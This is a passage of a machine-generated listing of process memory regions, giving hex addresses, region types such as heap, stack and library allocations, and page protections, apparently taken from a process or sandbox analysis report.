page read and write
|
||
4D10000
|
trusted library allocation
|
page read and write
|
||
779E000
|
stack
|
page read and write
|
||
66D000
|
heap
|
page read and write
|
||
4892000
|
trusted library allocation
|
page read and write
|
||
745E000
|
stack
|
page read and write
|
||
514B000
|
heap
|
page read and write
|
||
7A4E000
|
stack
|
page read and write
|
||
510F000
|
heap
|
page read and write
|
||
7110000
|
trusted library allocation
|
page read and write
|
||
4D08000
|
trusted library allocation
|
page read and write
|
||
4D08000
|
trusted library allocation
|
page read and write
|
||
7090000
|
heap
|
page read and write
|
||
8EC0000
|
trusted library allocation
|
page read and write
|
||
6FC0000
|
trusted library allocation
|
page read and write
|
||
4D65000
|
trusted library allocation
|
page read and write
|
||
330D000
|
trusted library allocation
|
page execute and read and write
|
||
670B000
|
stack
|
page read and write
|
||
429F000
|
stack
|
page read and write
|
||
4D54000
|
trusted library allocation
|
page read and write
|
||
7F9E000
|
stack
|
page read and write
|
||
799E000
|
stack
|
page read and write
|
||
7E9E000
|
stack
|
page read and write
|
||
61B9000
|
trusted library allocation
|
page read and write
|
||
7112000
|
heap
|
page read and write
|
||
4A5E000
|
stack
|
page read and write
|
||
3670000
|
trusted library allocation
|
page read and write
|
||
6C0C000
|
heap
|
page read and write
|
||
3472000
|
heap
|
page read and write
|
||
5368000
|
trusted library allocation
|
page read and write
|
||
80DD000
|
stack
|
page read and write
|
||
7C50000
|
trusted library allocation
|
page read and write
|
||
4CF4000
|
trusted library allocation
|
page read and write
|
||
7320000
|
trusted library allocation
|
page execute and read and write
|
||
4EC0000
|
trusted library allocation
|
page read and write
|
||
4D46000
|
trusted library allocation
|
page read and write
|
||
70B1000
|
heap
|
page read and write
|
||
4D75000
|
trusted library allocation
|
page read and write
|
||
6C2E000
|
stack
|
page read and write
|
||
89E0000
|
trusted library allocation
|
page read and write
|
||
510F000
|
heap
|
page read and write
|
||
760000
|
trusted library allocation
|
page read and write
|
||
3270000
|
heap
|
page read and write
|
||
3664000
|
trusted library allocation
|
page read and write
|
||
71ED000
|
stack
|
page read and write
|
||
2B90000
|
heap
|
page read and write
|
||
748E000
|
stack
|
page read and write
|
||
C90000
|
heap
|
page read and write
|
||
5797000
|
trusted library allocation
|
page read and write
|
||
79DE000
|
stack
|
page read and write
|
||
6ED4000
|
heap
|
page read and write
|
||
6BDF000
|
heap
|
page read and write
|
||
4CF3000
|
trusted library allocation
|
page read and write
|
||
5631000
|
trusted library allocation
|
page read and write
|
||
296D000
|
heap
|
page read and write
|
||
74B5000
|
heap
|
page read and write
|
||
5007000
|
trusted library allocation
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
544D000
|
trusted library allocation
|
page read and write
|
||
805C000
|
heap
|
page read and write
|
||
8CA2000
|
trusted library allocation
|
page read and write
|
||
5C0000
|
trusted library allocation
|
page read and write
|
||
5669000
|
trusted library allocation
|
page read and write
|
||
4D08000
|
trusted library allocation
|
page read and write
|
||
6EE4000
|
heap
|
page read and write
|
||
4C8B000
|
trusted library allocation
|
page read and write
|
||
4E3C000
|
trusted library allocation
|
page read and write
|
||
5E7D000
|
trusted library allocation
|
page read and write
|
||
E0F000
|
stack
|
page read and write
|
||
7204000
|
trusted library allocation
|
page read and write
|
||
7CD2000
|
trusted library allocation
|
page read and write
|
||
2EEB000
|
stack
|
page read and write
|
||
6C90000
|
heap
|
page execute and read and write
|
||
297C000
|
heap
|
page read and write
|
||
6CFE000
|
stack
|
page read and write
|
||
7400000
|
trusted library allocation
|
page read and write
|
||
491D000
|
stack
|
page read and write
|
||
742E000
|
stack
|
page read and write
|
||
6DE0000
|
direct allocation
|
page read and write
|
||
7B60000
|
trusted library allocation
|
page read and write
|
||
791E000
|
stack
|
page read and write
|
||
8A7E000
|
stack
|
page read and write
|
||
2C0D000
|
heap
|
page read and write
|
||
298D000
|
trusted library allocation
|
page read and write
|
||
700A000
|
heap
|
page read and write
|
||
5E91000
|
trusted library allocation
|
page read and write
|
||
5031000
|
trusted library allocation
|
page read and write
|
||
7ED0000
|
trusted library allocation
|
page read and write
|
||
47F0000
|
unkown
|
page readonly
|
||
7E50000
|
heap
|
page read and write
|
||
481E000
|
stack
|
page read and write
|
||
35FF000
|
stack
|
page read and write
|
||
7FDE000
|
stack
|
page read and write
|
||
74EE000
|
stack
|
page read and write
|
||
4CF0000
|
trusted library allocation
|
page read and write
|
||
9A0000
|
heap
|
page read and write
|
||
35A0000
|
heap
|
page read and write
|
||
E30000
|
heap
|
page read and write
|
||
447E000
|
stack
|
page read and write
|
||
5BE000
|
stack
|
page read and write
|
||
6EBC000
|
heap
|
page read and write
|
||
73FE000
|
stack
|
page read and write
|
||
4D1C000
|
trusted library allocation
|
page read and write
|
||
85F0000
|
trusted library allocation
|
page read and write
|
||
272E000
|
stack
|
page read and write
|
||
4F54000
|
trusted library allocation
|
page read and write
|
||
56B1000
|
heap
|
page read and write
|
||
4D1E000
|
trusted library allocation
|
page read and write
|
||
8650000
|
trusted library allocation
|
page execute and read and write
|
||
7C0D000
|
stack
|
page read and write
|
||
3497000
|
trusted library allocation
|
page execute and read and write
|
||
54A5000
|
heap
|
page execute and read and write
|
||
5859000
|
trusted library allocation
|
page read and write
|
||
7B0000
|
heap
|
page readonly
|
||
704E000
|
stack
|
page read and write
|
||
819A000
|
trusted library allocation
|
page read and write
|
||
70CE000
|
stack
|
page read and write
|
||
34E5000
|
heap
|
page execute and read and write
|
||
45C7000
|
trusted library allocation
|
page execute and read and write
|
||
7EE0000
|
trusted library allocation
|
page read and write
|
||
4D1D000
|
trusted library allocation
|
page read and write
|
||
8EC000
|
heap
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
742000
|
trusted library allocation
|
page read and write
|
||
74EE000
|
stack
|
page read and write
|
||
B50000
|
trusted library allocation
|
page read and write
|
||
298F000
|
heap
|
page read and write
|
||
2C2D000
|
heap
|
page read and write
|
||
3450000
|
trusted library allocation
|
page read and write
|
||
502C000
|
stack
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
3537000
|
heap
|
page read and write
|
||
433E000
|
stack
|
page read and write
|
||
75BB000
|
stack
|
page read and write
|
||
783A000
|
heap
|
page read and write
|
||
D67000
|
stack
|
page read and write
|
||
36E0000
|
heap
|
page read and write
|
||
6C60000
|
trusted library allocation
|
page read and write
|
||
4D20000
|
trusted library allocation
|
page read and write
|
||
7E7D000
|
trusted library allocation
|
page read and write
|
||
8E4D000
|
stack
|
page read and write
|
||
806A000
|
direct allocation
|
page read and write
|
||
6EFF000
|
heap
|
page read and write
|
||
7BEE000
|
heap
|
page read and write
|
||
524B000
|
trusted library allocation
|
page read and write
|
||
3660000
|
trusted library allocation
|
page read and write
|
||
480E000
|
stack
|
page read and write
|
||
7C02000
|
heap
|
page read and write
|
||
AE4000
|
trusted library allocation
|
page read and write
|
||
86E0000
|
trusted library allocation
|
page read and write
|
||
9D000
|
stack
|
page read and write
|
||
7A7000
|
heap
|
page read and write
|
||
4EBC000
|
trusted library allocation
|
page read and write
|
||
8CC0000
|
trusted library allocation
|
page execute and read and write
|
||
B70000
|
trusted library allocation
|
page read and write
|
||
4F88000
|
trusted library allocation
|
page read and write
|
||
339B000
|
heap
|
page read and write
|
||
8E75000
|
trusted library allocation
|
page read and write
|
||
2C10000
|
heap
|
page read and write
|
||
5010000
|
heap
|
page read and write
|
||
6399000
|
trusted library allocation
|
page read and write
|
||
510F000
|
heap
|
page read and write
|
||
86D0000
|
trusted library allocation
|
page read and write
|
||
839A000
|
trusted library allocation
|
page read and write
|
||
34E4000
|
heap
|
page read and write
|
||
850000
|
trusted library allocation
|
page read and write
|
||
35F3000
|
trusted library allocation
|
page execute and read and write
|
||
7F57000
|
trusted library allocation
|
page read and write
|
||
B9A000
|
trusted library allocation
|
page execute and read and write
|
||
7980000
|
trusted library allocation
|
page read and write
|
||
53B8000
|
trusted library allocation
|
page read and write
|
||
509A000
|
trusted library allocation
|
page read and write
|
||
105E000
|
stack
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
617000
|
heap
|
page read and write
|
||
B80000
|
trusted library allocation
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page read and write
|
||
5901000
|
trusted library allocation
|
page read and write
|
||
AD7000
|
trusted library allocation
|
page execute and read and write
|
||
8FA000
|
stack
|
page read and write
|
||
6216000
|
trusted library allocation
|
page read and write
|
||
7C5000
|
heap
|
page read and write
|
||
7460000
|
trusted library allocation
|
page read and write
|
||
EE0000
|
trusted library allocation
|
page read and write
|
||
58CA000
|
trusted library allocation
|
page read and write
|
||
5799000
|
trusted library allocation
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
6E8E000
|
stack
|
page read and write
|
||
27BE000
|
stack
|
page read and write
|
||
514C000
|
heap
|
page read and write
|
||
87E0000
|
trusted library allocation
|
page read and write
|
||
567B000
|
trusted library allocation
|
page read and write
|
||
70C9000
|
heap
|
page read and write
|
||
4530000
|
trusted library allocation
|
page execute and read and write
|
||
81A0000
|
trusted library allocation
|
page read and write
|
||
3679000
|
trusted library allocation
|
page read and write
|
||
838A000
|
trusted library allocation
|
page read and write
|
||
B90000
|
heap
|
page readonly
|
||
7DEE000
|
stack
|
page read and write
|
||
298D000
|
heap
|
page read and write
|
||
77EB000
|
stack
|
page read and write
|
||
4A5000
|
heap
|
page read and write
|
||
68CE000
|
stack
|
page read and write
|
||
2FBC000
|
stack
|
page read and write
|
||
7BD0000
|
heap
|
page read and write
|
||
678F000
|
stack
|
page read and write
|
||
4D1C000
|
trusted library allocation
|
page read and write
|
||
7C3E000
|
stack
|
page read and write
|
||
3377000
|
heap
|
page read and write
|
||
299D000
|
heap
|
page read and write
|
||
6EFE000
|
stack
|
page read and write
|
||
2960000
|
heap
|
page read and write
|
||
368A000
|
trusted library allocation
|
page execute and read and write
|
||
73D0000
|
trusted library allocation
|
page read and write
|
||
4CFE000
|
trusted library allocation
|
page read and write
|
||
3310000
|
trusted library allocation
|
page read and write
|
||
28DC000
|
heap
|
page read and write
|
||
52DE000
|
stack
|
page read and write
|
||
7010000
|
trusted library allocation
|
page read and write
|
||
6DA0000
|
direct allocation
|
page read and write
|
||
ED4000
|
trusted library allocation
|
page read and write
|
||
56AC000
|
heap
|
page read and write
|
||
79CD000
|
stack
|
page read and write
|
||
4D39000
|
trusted library allocation
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
4D05000
|
trusted library allocation
|
page read and write
|
||
75F1000
|
heap
|
page read and write
|
||
5EA6000
|
trusted library allocation
|
page read and write
|
||
74A1000
|
trusted library allocation
|
page read and write
|
||
D98000
|
trusted library allocation
|
page read and write
|
||
36C0000
|
trusted library allocation
|
page read and write
|
||
7B3E000
|
stack
|
page read and write
|
||
7C65000
|
heap
|
page read and write
|
||
71F000
|
stack
|
page read and write
|
||
620E000
|
trusted library allocation
|
page read and write
|
||
7B40000
|
trusted library allocation
|
page read and write
|
||
7EED000
|
stack
|
page read and write
|
||
A11000
|
heap
|
page read and write
|
||
35F4000
|
trusted library allocation
|
page read and write
|
||
2998000
|
heap
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
2C15000
|
heap
|
page read and write
|
||
4CE6000
|
trusted library allocation
|
page read and write
|
||
5E7D000
|
trusted library allocation
|
page read and write
|
||
8030000
|
direct allocation
|
page read and write
|
||
35EE000
|
heap
|
page read and write
|
||
8B8D000
|
stack
|
page read and write
|
||
33AE000
|
unkown
|
page read and write
|
||
4D18000
|
trusted library allocation
|
page read and write
|
||
77AD000
|
stack
|
page read and write
|
||
DD9000
|
stack
|
page read and write
|
||
298D000
|
heap
|
page read and write
|
||
32F0000
|
trusted library allocation
|
page read and write
|
||
5639000
|
trusted library allocation
|
page read and write
|
||
7F30000
|
heap
|
page read and write
|
||
87E0000
|
trusted library allocation
|
page execute and read and write
|
||
352F000
|
heap
|
page read and write
|
||
8DAE000
|
stack
|
page read and write
|
||
71CE000
|
stack
|
page read and write
|
||
33F9000
|
heap
|
page read and write
|
||
4D54000
|
trusted library allocation
|
page read and write
|
||
4986000
|
trusted library allocation
|
page read and write
|
||
812C000
|
heap
|
page read and write
|
||
8D5000
|
heap
|
page read and write
|
||
6F4B000
|
heap
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page execute and read and write
|
||
5648000
|
heap
|
page read and write
|
||
798E000
|
stack
|
page read and write
|
||
6FF4000
|
trusted library allocation
|
page read and write
|
||
7330000
|
trusted library allocation
|
page read and write
|
||
4D57000
|
trusted library allocation
|
page read and write
|
||
8599000
|
stack
|
page read and write
|
||
4BBE000
|
stack
|
page read and write
|
||
7F1D000
|
stack
|
page read and write
|
||
87A0000
|
heap
|
page read and write
|
||
7897000
|
heap
|
page read and write
|
||
6E3F000
|
stack
|
page read and write
|
||
2FFE000
|
stack
|
page read and write
|
||
6C15000
|
heap
|
page read and write
|
||
4D3A000
|
trusted library allocation
|
page read and write
|
||
4D3F000
|
trusted library allocation
|
page read and write
|
||
CD0000
|
heap
|
page execute and read and write
|
||
32D0000
|
heap
|
page read and write
|
||
694E000
|
stack
|
page read and write
|
||
2D8B000
|
heap
|
page read and write
|
||
811E000
|
heap
|
page read and write
|
||
3340000
|
trusted library allocation
|
page read and write
|
||
72AE000
|
stack
|
page read and write
|
||
7EF0000
|
trusted library allocation
|
page read and write
|
||
45DF000
|
stack
|
page read and write
|
||
8126000
|
heap
|
page read and write
|
||
8D0E000
|
stack
|
page read and write
|
||
EDD000
|
trusted library allocation
|
page execute and read and write
|
||
354C000
|
heap
|
page read and write
|
||
341C000
|
heap
|
page read and write
|
||
4FE0000
|
trusted library allocation
|
page execute and read and write
|
||
2DC0000
|
heap
|
page read and write
|
||
724E000
|
stack
|
page read and write
|
||
988000
|
heap
|
page read and write
|
||
7DFE000
|
trusted library allocation
|
page read and write
|
||
4D44000
|
trusted library allocation
|
page read and write
|
||
787D000
|
heap
|
page read and write
|
||
861E000
|
stack
|
page read and write
|
||
4CE8000
|
trusted library allocation
|
page read and write
|
||
A60000
|
heap
|
page read and write
|
||
806A000
|
direct allocation
|
page read and write
|
||
3400000
|
heap
|
page read and write
|
||
355D000
|
heap
|
page read and write
|
||
8EC0000
|
trusted library allocation
|
page read and write
|
||
3622000
|
trusted library allocation
|
page read and write
|
||
6FC0000
|
trusted library allocation
|
page read and write
|
||
7E00000
|
trusted library allocation
|
page read and write
|
||
7D0E000
|
stack
|
page read and write
|
||
8C0E000
|
stack
|
page read and write
|
||
A68000
|
heap
|
page read and write
|
||
4D5C000
|
trusted library allocation
|
page read and write
|
||
8CF0000
|
trusted library allocation
|
page read and write
|
||
697E000
|
stack
|
page read and write
|
||
3320000
|
trusted library allocation
|
page read and write
|
||
297F000
|
heap
|
page read and write
|
||
8369000
|
trusted library allocation
|
page read and write
|
||
4D5C000
|
trusted library allocation
|
page read and write
|
||
5670000
|
heap
|
page read and write
|
||
869D000
|
stack
|
page read and write
|
||
809E000
|
stack
|
page read and write
|
||
7455000
|
heap
|
page execute and read and write
|
||
2950000
|
trusted library section
|
page read and write
|
||
4600000
|
heap
|
page read and write
|
||
7EB0000
|
trusted library allocation
|
page read and write
|
||
6C6E000
|
stack
|
page read and write
|
||
7190000
|
trusted library allocation
|
page read and write
|
||
4CEE000
|
trusted library allocation
|
page read and write
|
||
3475000
|
heap
|
page read and write
|
||
7730000
|
heap
|
page read and write
|
||
5369000
|
trusted library allocation
|
page read and write
|
||
299D000
|
heap
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
332D000
|
heap
|
page read and write
|
||
28E6000
|
heap
|
page read and write
|
||
89BB000
|
trusted library allocation
|
page read and write
|
||
9020000
|
trusted library allocation
|
page read and write
|
||
8960000
|
heap
|
page read and write
|
||
4EA7000
|
heap
|
page read and write
|
||
4D36000
|
trusted library allocation
|
page read and write
|
||
80B0000
|
direct allocation
|
page read and write
|
||
2C09000
|
heap
|
page read and write
|
||
2978000
|
heap
|
page read and write
|
||
7161000
|
heap
|
page read and write
|
||
32F7000
|
heap
|
page read and write
|
||
4C00000
|
heap
|
page read and write
|
||
E55000
|
heap
|
page read and write
|
||
8C2D000
|
stack
|
page read and write
|
||
7B4D000
|
stack
|
page read and write
|
||
869E000
|
stack
|
page read and write
|
||
9CA000
|
heap
|
page read and write
|
||
8F00000
|
trusted library allocation
|
page execute and read and write
|
||
E30000
|
trusted library allocation
|
page read and write
|
||
57B8000
|
trusted library allocation
|
page read and write
|
||
2992000
|
heap
|
page read and write
|
||
53DB000
|
trusted library allocation
|
page read and write
|
||
7080000
|
heap
|
page execute and read and write
|
||
4580000
|
trusted library allocation
|
page read and write
|
||
5101000
|
heap
|
page read and write
|
||
4BC0000
|
trusted library allocation
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
75FE000
|
stack
|
page read and write
|
||
4D4E000
|
trusted library allocation
|
page read and write
|
||
4593000
|
trusted library allocation
|
page execute and read and write
|
||
ADB000
|
trusted library allocation
|
page execute and read and write
|
||
535D000
|
trusted library allocation
|
page read and write
|
||
B89000
|
trusted library allocation
|
page read and write
|
||
2810000
|
trusted library allocation
|
page execute and read and write
|
||
327E000
|
stack
|
page read and write
|
||
4D22000
|
trusted library allocation
|
page read and write
|
||
54EE000
|
stack
|
page read and write
|
||
7A10000
|
trusted library allocation
|
page execute and read and write
|
||
4B70000
|
heap
|
page execute and read and write
|
||
4D0D000
|
trusted library allocation
|
page read and write
|
||
7391000
|
direct allocation
|
page read and write
|
||
AF0000
|
trusted library allocation
|
page read and write
|
||
75EF000
|
stack
|
page read and write
|
||
829E000
|
stack
|
page read and write
|
||
2D61000
|
heap
|
page read and write
|
||
693E000
|
stack
|
page read and write
|
||
7BD0000
|
trusted library allocation
|
page read and write
|
||
913F000
|
stack
|
page read and write
|
||
2C10000
|
heap
|
page read and write
|
||
569B000
|
heap
|
page read and write
|
||
2BC000
|
stack
|
page read and write
|
||
E10000
|
heap
|
page execute and read and write
|
||
907E000
|
stack
|
page read and write
|
||
7BC0000
|
trusted library allocation
|
page read and write
|
||
4D02000
|
trusted library allocation
|
page read and write
|
||
2972000
|
heap
|
page read and write
|
||
8710000
|
heap
|
page read and write
|
||
742F000
|
stack
|
page read and write
|
||
6E60000
|
heap
|
page read and write
|
||
2820000
|
heap
|
page read and write
|
||
8EA0000
|
trusted library allocation
|
page read and write
|
||
57C7000
|
trusted library allocation
|
page read and write
|
||
4D77000
|
trusted library allocation
|
page read and write
|
||
710F000
|
heap
|
page read and write
|
||
6D1E000
|
stack
|
page read and write
|
||
828000
|
trusted library allocation
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
750000
|
heap
|
page read and write
|
||
73F0000
|
trusted library allocation
|
page read and write
|
||
48F0000
|
heap
|
page execute and read and write
|
||
6990000
|
heap
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page execute and read and write
|
||
7C5A000
|
heap
|
page read and write
|
||
746B000
|
stack
|
page read and write
|
||
7105000
|
heap
|
page read and write
|
||
76AF000
|
stack
|
page read and write
|
||
4D3E000
|
trusted library allocation
|
page read and write
|
||
569D000
|
heap
|
page read and write
|
||
7F4000
|
trusted library allocation
|
page read and write
|
||
840000
|
trusted library allocation
|
page read and write
|
||
4E6E000
|
stack
|
page read and write
|
||
4F1E000
|
stack
|
page read and write
|
||
762B000
|
stack
|
page read and write
|
||
4CE1000
|
trusted library allocation
|
page read and write
|
||
7382000
|
direct allocation
|
page read and write
|
||
6512000
|
trusted library allocation
|
page read and write
|
||
5092000
|
direct allocation
|
page read and write
|
||
7A79000
|
heap
|
page read and write
|
||
4EC5000
|
trusted library allocation
|
page execute and read and write
|
||
343E000
|
stack
|
page read and write
|
||
840E000
|
stack
|
page read and write
|
||
8D6D000
|
stack
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page read and write
|
||
72EF000
|
stack
|
page read and write
|
||
554E000
|
stack
|
page read and write
|
||
C10000
|
heap
|
page read and write
|
||
D8E000
|
stack
|
page read and write
|
||
341D000
|
unkown
|
page read and write
|
||
534B000
|
trusted library allocation
|
page read and write
|
||
355B000
|
heap
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
775E000
|
stack
|
page read and write
|
||
2D24000
|
heap
|
page read and write
|
||
7BFE000
|
trusted library allocation
|
page read and write
|
||
B15000
|
trusted library allocation
|
page execute and read and write
|
||
73EB000
|
stack
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
7490000
|
trusted library section
|
page read and write
|
||
73E000
|
stack
|
page read and write
|
||
5D0000
|
trusted library allocation
|
page read and write
|
||
4CEE000
|
trusted library allocation
|
page read and write
|
||
2D83000
|
heap
|
page read and write
|
||
86A0000
|
heap
|
page read and write
|
||
724D000
|
stack
|
page read and write
|
||
88E0000
|
heap
|
page read and write
|
||
83C3000
|
trusted library allocation
|
page read and write
|
||
7BD8000
|
heap
|
page read and write
|
||
720D000
|
stack
|
page read and write
|
||
336B000
|
heap
|
page read and write
|
||
7020000
|
trusted library allocation
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
73B0000
|
trusted library allocation
|
page read and write
|
||
6C0000
|
heap
|
page read and write
|
||
7EF00000
|
trusted library allocation
|
page execute and read and write
|
||
61F6000
|
trusted library allocation
|
page read and write
|
||
550B000
|
trusted library allocation
|
page read and write
|
||
68BF0000
|
unkown
|
page readonly
|
||
292D000
|
stack
|
page read and write
|
||
87F0000
|
heap
|
page read and write
|
||
6ECF000
|
stack
|
page read and write
|
||
466B000
|
trusted library allocation
|
page read and write
|
||
7C3D000
|
heap
|
page read and write
|
||
ED3000
|
trusted library allocation
|
page execute and read and write
|
||
3310000
|
trusted library allocation
|
page read and write
|
||
825F000
|
stack
|
page read and write
|
||
28C0000
|
heap
|
page read and write
|
||
542000
|
unkown
|
page execute and read and write
|
||
4F8000
|
stack
|
page read and write
|
||
517E000
|
trusted library allocation
|
page read and write
|
||
7BF7000
|
heap
|
page read and write
|
||
4B1E000
|
stack
|
page read and write
|
||
8AF7000
|
heap
|
page read and write
|
||
4CE6000
|
trusted library allocation
|
page read and write
|
||
45F0000
|
heap
|
page readonly
|
||
926000
|
heap
|
page read and write
|
||
2C18000
|
heap
|
page read and write
|
||
869000
|
heap
|
page read and write
|
||
2A34000
|
trusted library allocation
|
page read and write
|
||
7823000
|
heap
|
page read and write
|
||
736D000
|
stack
|
page read and write
|
||
6F50000
|
trusted library allocation
|
page execute and read and write
|
||
6CAE000
|
stack
|
page read and write
|
||
8CAE000
|
stack
|
page read and write
|
||
327E000
|
stack
|
page read and write
|
||
83B0000
|
trusted library allocation
|
page read and write
|
||
840000
|
trusted library allocation
|
page execute and read and write
|
||
E60000
|
trusted library allocation
|
page execute and read and write
|
||
5EA8000
|
trusted library allocation
|
page read and write
|
||
7E60000
|
trusted library allocation
|
page read and write
|
||
7D7000
|
heap
|
page read and write
|
||
740000
|
trusted library allocation
|
page read and write
|
||
6B0E000
|
stack
|
page read and write
|
||
D2C000
|
stack
|
page read and write
|
||
3300000
|
heap
|
page read and write
|
||
3609000
|
trusted library allocation
|
page read and write
|
||
149000
|
stack
|
page read and write
|
||
323C000
|
stack
|
page read and write
|
||
4CE2000
|
trusted library allocation
|
page read and write
|
||
506E000
|
stack
|
page read and write
|
||
8BCF000
|
stack
|
page read and write
|
||
5EA0000
|
trusted library allocation
|
page read and write
|
||
7A76000
|
heap
|
page read and write
|
||
514C000
|
heap
|
page read and write
|
||
7AC1000
|
heap
|
page read and write
|
||
7881000
|
heap
|
page read and write
|
||
2D81000
|
heap
|
page read and write
|
||
531F000
|
stack
|
page read and write
|
||
4CF0000
|
trusted library allocation
|
page read and write
|
||
7B7D000
|
stack
|
page read and write
|
||
35DE000
|
heap
|
page read and write
|
||
520D000
|
trusted library allocation
|
page read and write
|
||
80DE000
|
stack
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
298D000
|
heap
|
page read and write
|
||
7CB0000
|
trusted library allocation
|
page read and write
|
||
63E8000
|
trusted library allocation
|
page read and write
|
||
4EA0000
|
heap
|
page read and write
|
||
7A0E000
|
stack
|
page read and write
|
||
299D000
|
heap
|
page read and write
|
||
78B1000
|
heap
|
page read and write
|
||
5352000
|
trusted library allocation
|
page read and write
|
||
A6E000
|
stack
|
page read and write
|
||
5103000
|
heap
|
page read and write
|
||
789E000
|
heap
|
page read and write
|
||
2D6C000
|
heap
|
page read and write
|
||
3680000
|
trusted library allocation
|
page read and write
|
||
501E000
|
stack
|
page read and write
|
||
7058000
|
heap
|
page read and write
|
||
BC0000
|
trusted library allocation
|
page read and write
|
||
5B80000
|
direct allocation
|
page read and write
|
||
5964000
|
trusted library allocation
|
page read and write
|
||
3550000
|
trusted library allocation
|
page read and write
|
||
78A8000
|
heap
|
page read and write
|
||
8E94000
|
trusted library allocation
|
page read and write
|
||
5EBC000
|
trusted library allocation
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
3440000
|
trusted library allocation
|
page read and write
|
||
348A000
|
heap
|
page read and write
|
||
5070000
|
trusted library allocation
|
page read and write
|
||
89CF000
|
stack
|
page read and write
|
||
4D14000
|
trusted library allocation
|
page read and write
|
||
4FBC000
|
stack
|
page read and write
|
||
90FE000
|
stack
|
page read and write
|
||
9A8000
|
heap
|
page read and write
|
||
8BC0000
|
heap
|
page read and write
|
||
2740000
|
trusted library allocation
|
page read and write
|
||
3620000
|
trusted library allocation
|
page read and write
|
||
B12000
|
trusted library allocation
|
page read and write
|
||
5B3F000
|
stack
|
page read and write
|
||
831E000
|
stack
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
8A50000
|
trusted library allocation
|
page read and write
|
||
8740000
|
trusted library allocation
|
page execute and read and write
|
||
5365000
|
trusted library allocation
|
page read and write
|
||
E70000
|
heap
|
page readonly
|
||
4CE1000
|
trusted library allocation
|
page read and write
|
||
5338000
|
trusted library allocation
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page read and write
|
||
74BE000
|
stack
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
522C000
|
stack
|
page read and write
|
||
4D02000
|
trusted library allocation
|
page read and write
|
||
4B7E000
|
trusted library allocation
|
page read and write
|
||
352E000
|
stack
|
page read and write
|
||
DE3000
|
heap
|
page read and write
|
||
6E00000
|
direct allocation
|
page read and write
|
||
4F9E000
|
stack
|
page read and write
|
||
2D74000
|
heap
|
page read and write
|
||
7A59000
|
heap
|
page read and write
|
||
7826000
|
heap
|
page read and write
|
||
7BD0000
|
trusted library allocation
|
page read and write
|
||
4FF0000
|
trusted library allocation
|
page read and write
|
||
70F4000
|
heap
|
page read and write
|
||
8ABC000
|
heap
|
page read and write
|
||
7A61000
|
heap
|
page read and write
|
||
B73000
|
trusted library allocation
|
page execute and read and write
|
||
8DEF000
|
stack
|
page read and write
|
||
7860000
|
heap
|
page read and write
|
||
837F000
|
trusted library allocation
|
page read and write
|
||
443D000
|
stack
|
page read and write
|
||
860000
|
heap
|
page read and write
|
||
7420000
|
trusted library allocation
|
page read and write
|
||
4C8E000
|
stack
|
page read and write
|
||
7BA0000
|
trusted library allocation
|
page read and write
|
||
2CA0000
|
heap
|
page read and write
|
||
4D02000
|
trusted library allocation
|
page read and write
|
||
4D77000
|
trusted library allocation
|
page read and write
|
||
4D02000
|
trusted library allocation
|
page read and write
|
||
53C8000
|
trusted library allocation
|
page read and write
|
||
8950000
|
trusted library allocation
|
page execute and read and write
|
||
4901000
|
trusted library allocation
|
page read and write
|
||
6DE0000
|
trusted library allocation
|
page read and write
|
||
7C80000
|
trusted library allocation
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
7B80000
|
trusted library allocation
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
7E60000
|
trusted library allocation
|
page execute and read and write
|
||
548A000
|
trusted library allocation
|
page read and write
|
||
73E0000
|
trusted library allocation
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
86C0000
|
trusted library allocation
|
page execute and read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
3360000
|
trusted library allocation
|
page read and write
|
||
431E000
|
stack
|
page read and write
|
||
71B0000
|
trusted library allocation
|
page read and write
|
||
9AC000
|
heap
|
page read and write
|
||
7E80000
|
trusted library allocation
|
page read and write
|
||
2787000
|
heap
|
page read and write
|
||
2984000
|
trusted library allocation
|
page read and write
|
||
299D000
|
heap
|
page read and write
|
||
73D0000
|
trusted library allocation
|
page read and write
|
||
899F000
|
stack
|
page read and write
|
||
5280000
|
trusted library allocation
|
page read and write
|
||
719E000
|
stack
|
page read and write
|
||
6A00000
|
heap
|
page read and write
|
||
33F0000
|
heap
|
page read and write
|
||
4D14000
|
trusted library allocation
|
page read and write
|
||
56E6000
|
trusted library allocation
|
page read and write
|
||
33CE000
|
stack
|
page read and write
|
||
D5E000
|
stack
|
page read and write
|
||
76BA000
|
stack
|
page read and write
|
||
8A30000
|
trusted library allocation
|
page read and write
|
||
2D7C000
|
heap
|
page read and write
|
||
4E50000
|
trusted library allocation
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
7AF0000
|
trusted library allocation
|
page read and write
|
||
356F000
|
heap
|
page read and write
|
||
819E000
|
stack
|
page read and write
|
||
7F528000
|
trusted library allocation
|
page execute and read and write
|
||
4796000
|
trusted library allocation
|
page read and write
|
||
6389000
|
trusted library allocation
|
page read and write
|
||
5BD0000
|
heap
|
page read and write
|
||
55A0000
|
heap
|
page read and write
|
||
524E000
|
stack
|
page read and write
|
||
7050000
|
heap
|
page execute and read and write
|
||
339D000
|
heap
|
page read and write
|
||
510C000
|
heap
|
page read and write
|
||
402000
|
unkown
|
page readonly
|
||
68BD000
|
stack
|
page read and write
|
||
AAD000
|
